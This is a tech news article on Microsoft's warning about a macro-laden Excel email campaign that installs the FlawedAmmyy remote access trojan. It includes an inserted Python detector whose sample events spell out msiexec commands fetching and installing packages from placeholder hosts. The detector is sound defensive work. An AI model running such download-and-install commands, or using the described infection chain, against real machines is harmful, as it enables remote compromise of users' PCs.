
Microsoft Warns Users of Excel Email Campaign That Can Compromise Fully-Patched PCs

A specially crafted Excel document can use macros to perform a complex infection chain that will run a Remote Access Trojan in the PC's memory. Windows Defender ATP users are protected from the attack.


A few weeks after an Excel vulnerability that let attackers install a trojan, Microsoft has issued another warning. This time, it concerns a separate, email-based campaign that looks to install the notorious FlawedAmmyy RAT on devices.

Via a specially crafted Excel email attachment, attackers can use malicious macro functions and a “complex infection chain” to run the RAT in memory. FlawedAmmyy rose to notoriety during email campaigns in March 2018. It's thought to have targeted finance and retail, and it allows full remote access to the PC.

Microsoft discovered the campaign with the help of anomaly detection. It says the attack starts with an .xls attachment with Korean content.

“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” explained Microsoft Security Intelligence on Twitter.

“This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory.”

Of course, users should never open .xls files from unverified senders, nor should they enable macros in Excel by default. Clearly, though, Microsoft thinks this is enough of a risk to warrant warning users.

The good news is that customers with Windows Defender ATP should be safe. The software was able to use machine learning protections to successfully block all components on first sight. This should limit the impact on organizations.
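The first stage of the chain quoted above (Excel launching msiexec.exe, which then fetches an MSI archive) is visible in process-creation telemetry. As an added example, not from Microsoft or the original article, this Python sketch flags that parent-child pattern; the event field names, the list of Office parents and the sample events are assumptions constructed for illustration.

```python
import re

# Office applications that should not normally launch an installer (assumed list)
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# msiexec accepts a URL as the package argument; match http(s) in the command line
REMOTE_PACKAGE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    """Return the lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def classify(event):
    """Return a finding for one process-creation event, or None if benign."""
    # Hypothetical schema: parent_image, image, command_line
    if basename(event.get("image", "")) != "msiexec.exe":
        return None
    parent = basename(event.get("parent_image", ""))
    remote = REMOTE_PACKAGE.search(event.get("command_line", ""))
    if parent in OFFICE_PARENTS and remote:
        return "high: Office app launched msiexec with remote package " + remote.group(0)
    if parent in OFFICE_PARENTS:
        return "medium: Office app launched msiexec"
    if remote:
        return "low: msiexec installing from a URL"
    return None

def scan(events):
    """Return (index, finding) for every event that matches a rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

# Constructed sample events; hosts use the reserved .example TLD
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i http://files.example/pkg.msi /q"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'msiexec.exe /i "C:\Users\a\Downloads\setup.msi"'},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i https://cdn.example/agent.msi"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

The later stages described in the quote run in memory, so this check covers only the initial msiexec launch; the severity tiers are a triage aid, not a verdict.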

Earlier in the month, the company also warned that attackers are exploiting a Flash Player flaw via Excel to gain full control of PCs, in what's thought to be a nation-state attack. The flaw has since been patched, but it's clear Excel users should be especially cautious.

Ryan Maskell